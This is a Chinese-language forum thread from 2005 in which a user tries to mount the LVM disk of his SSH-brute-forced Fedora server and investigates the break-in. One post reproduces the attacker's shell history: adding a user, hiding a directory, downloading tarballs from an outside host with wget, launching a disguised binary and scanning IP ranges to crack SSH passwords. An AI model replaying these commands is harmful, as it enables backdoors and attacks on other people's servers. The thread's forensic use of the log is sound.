Chinaunix

标题: 请教mount问题 [打印本页]

---

作者: qry    时间: 2005-10-04 02:03
标题: 请教mount问题
有一Fedora Core 3 系统，普通IDE硬盘30G，被黑。

另有一Fedora Core 3系统，装有2个普通IDE硬盘，运行正常。

我把被黑的硬盘，拆下，装到另一系统上的光驱线上。

启动后。

fdisk /dev/hdc
p

看到：

1. 
   
2. Device    Boot      Start         End      Blocks   Id    System
   
3. /dev/hdc1   *           1          13      104391     83   Linux
   
4. /dev/hdc2              14        3737    29913030   8e  Linux LVM
   

复制代码

我就想把/dev/hdc2 mount上去。

但是出现错误如下：

1. 
   
2. [root@localhost dev]# mount -t auto /dev/hdc2 /mnt/hdc2
   
3. mount: you must specify the filesystem type
   
4. 
   
5. [root@localhost dev]# mount -t ext3 /dev/hdc2 /mnt/hdc2
   
6. mount: wrong fs type, bad option, bad superblock on /dev/hdc2,
   
7.        or too many mounted file systems
   

复制代码

奇怪的是/dev/hdc1 用-t auto 和 -t ext3都可以mount.

---

作者: q1208c    时间: 2005-10-04 08:18
标题: 请教mount问题
pvscan
vgscan
lvscan

然后试试 mount  lv 吧.

---

作者: kylints    时间: 2005-10-04 11:17
标题: 请教mount问题
怎么黑呀

---

作者: qry    时间: 2005-10-04 14:25
标题: 请教mount问题

原帖由 "q1208c" 发表：
pvscan
vgscan
lvscan

然后试试 mount  lv 吧.

谢谢，明天去试试。

今天我先用单用户模式把root的密码清掉了。

顺便问一下，如何检查黑客在我的机器上做了什么？当然这是一个模糊的，难以回答的问题，但如果能给一点点提示，我就感激不尽了。

---

作者: qry    时间: 2005-10-04 14:31
标题: 请教mount问题
[quote]原帖由 "kylints"]怎么黑呀[/quote 发表：


我这个服务器是自己装着玩的，还没有保护措施。我用ssh在家里也可以连上，方便，但问题就来了。

其实，上个星期，我浏览/var/log/ 下的记录就发现有人再试root密码，我当时想，我一个很简单的密码，竟被试了几千次，我想看看到底会发生什么。

结果，周末，我在家里等不上去了。

而且更坏的是，今天一早上班，收到ISP的通知，说我的upload流量超了。。。

---

作者: q1208c    时间: 2005-10-04 14:51
标题: 请教mount问题

原帖由 "qry" 发表：


谢谢，明天去试试。

今天我先用单用户模式把root的密码清掉了。

顺便问一下，如何检查黑客在我的机器上做了什么？当然这是一个模糊的，难以回答的问题，但如果能给一点点提示，我就感激不尽了。

   这个很不好说. 可以先试着看看 log, 如果没被清掉的话.

要是被清掉了就不好办了. 因为你太可能知道原来有哪些文件 , 哪些文件 被动过.

---

作者: qry    时间: 2005-10-04 15:02
标题: 请教mount问题

原帖由 "q1208c" 发表：
   这个很不好说. 可以先试着看看 log, 如果没被清掉的话.

要是被清掉了就不好办了. 因为你太可能知道原来有哪些文件 , 哪些文件 被动过.

还好，我还能看到一些 log,例如：/var/log/message, /var/log/secure等，估计那家伙忙着干坏事，忘了清这些了。

我记着有个兄弟在这里列过执行命令的记录，我忘了是哪个文件。

今天我把机器关了，所以只好等明天到公司去看了。

---

作者: cpsdc    时间: 2005-10-04 15:44
标题: 请教mount问题
那个记录好像是history

---

作者: qry    时间: 2005-10-05 00:46
标题: 请教mount问题
看到了，大家分析一下：

1. 
   
2.   883  adduser original
   
3.   884  passwd original
   
4.   885  uname -a
   
5.   886  ps -x
   
6.   887  cd /var/tmp
   
7.   888  mkdir .bash
   
8.   889   cd .bash
   
9.   890  wget members.lycos.co.uk/cata89/netstat.tgz
   
10.   891  tar zxvf netstat.tgz
    
11.   892  cd netstat
    
12.   893  cat mech.set
    
13.   894  chmod +x *
    
14.   895  ./inetd
    
15.   896  ./inetd
    
16.   897  ./inetd
    
17.   898  ./inetd
    
18.   899  ps -x
    
19.   900  cd
    
20.   901  ls
    
21.   902  wget members.lycos.co.uk/cata89/team3.tgz
    
22.   903  tar zxvf team3.tgz
    
23.   904  cd team2
    
24.   905  chmod +x *
    
25.   906  ls
    
26.   907  ./start 81.56
    
27.   908  ./start 207.89
    
28.   909  ./start 207.90
    
29.   910  ./start 207.91
    
30.   911  ./start 207.92
    
31.   912  ./start 207.93
    
32.   913  ./start 207.94
    
33.   914  ./start 207.95
    
34.   915  ./start 207.96
    

复制代码

---

作者: qry    时间: 2005-10-05 00:51
标题: 请教mount问题
[quote]原帖由 "cpsdc"]那个记录好像是history[/quote 发表：


我用history只看到从800号多开始，还好，他的操作都包括了。不过怎样能看到所有的history?

---

作者: qry    时间: 2005-10-05 01:57
标题: 请教mount问题

原帖由 "q1208c" 发表：
pvscan
vgscan
lvscan

然后试试 mount  lv 吧.

这些scan们只能看到前两块硬盘。

pvscan

1. 
   
2. [root@localhost ~]# pvscan
   
3.   PV /dev/hdb1   VG VolGroup00   lvm2 [28.62 GB / 0    free]
   
4.   PV /dev/hda2   VG VolGroup00   lvm2 [38.16 GB / 64.00 MB free]
   
5.   Total: 2 [66.78 GB] / in use: 2 [66.78 GB] / in no VG: 0 [0   ]
   

复制代码

vgscan

1. 
   
2. [root@localhost ~]# vgscan
   
3.   Reading all physical volumes.  This may take a while...
   
4.   Found volume group "VolGroup00" using metadata type lvm2
   

复制代码

lvscan

1. 
   
2. [root@localhost ~]# lvscan
   
3.   ACTIVE            '/dev/VolGroup00/LogVol00' [66.53 GB] inherit
   
4.   ACTIVE            '/dev/VolGroup00/LogVol01' [192.00 MB] inherit
   

复制代码

mount lv

1. 
   
2. [root@localhost ~]# mount lv
   
3. mount: can't find lv in /etc/fstab or /etc/mtab
   
4. [root@localhost ~]#
   
5. 
   
6. 
   

复制代码

---

作者: qry    时间: 2005-10-05 02:32
标题: 请教mount问题
我猜想可能是fedora的安全考虑。

于是，又找了一块硬盘（俺这里的好处就是废的硬盘多-：）），分区，格式化后就愉快地 mount上了。也是LVM的。

---

作者: qry    时间: 2005-10-05 05:42
标题: 请教mount问题
[quote]原帖由 "qry"][/quote 发表：


自己先看了一下。

两部分：
上半部分就是他要做的事情。

下半部分是用来扫描ssh的，然后破解。

我从他的字典里看到了我的密码，所以建议：稍微复杂化一下密码，这个字典就没用了。

---

作者: q1208c    时间: 2005-10-05 08:14
标题: 请教mount问题
[quote]原帖由 "qry"][/quote 发表：


兄弟, lv 不是你这样 mount 的吧?

试试这个. mount /dev/VolGroup00/LogVol00 /mnt/tmp

当然, 我看不到你这个 LogVol00 是在哪块盘, 你自己要确认它是在你要的那块盘上呀.

---

作者: qry    时间: 2005-10-05 08:24
标题: 请教mount问题

原帖由 "q1208c" 发表：


兄弟, lv 不是你这样 mount 的吧?

试试这个. mount /dev/VolGroup00/LogVol00 /mnt/tmp

当然, 我看不到你这个 LogVol00 是在哪块盘, 你自己要确认它是在你要的那块盘上呀.

这个我试过了。问题是我加的那个硬盘，不在 group里，它自己也没有group

对不起，不能那样mount。
不好意思，马上下班了，还要上英语补习班，下课后再来。

---

作者: q1208c    时间: 2005-10-05 08:26
标题: 请教mount问题

原帖由 "qry" 发表：


这个我试过了。问题是我加的那个硬盘，不在 group里，它自己也没有group

对不起，不能那样mount。

   看来那块硬盘上没有lv.

试试 fdisk -l 看一下先.

---

作者: qry    时间: 2005-10-05 13:17
标题: 请教mount问题

原帖由 "q1208c" 发表：
   看来那块硬盘上没有lv.

试试 fdisk -l 看一下先.

我看过了，没有lv.

---

欢迎光临 Chinaunix (http://bbs.chinaunix.net/)

Powered by Discuz! X3.2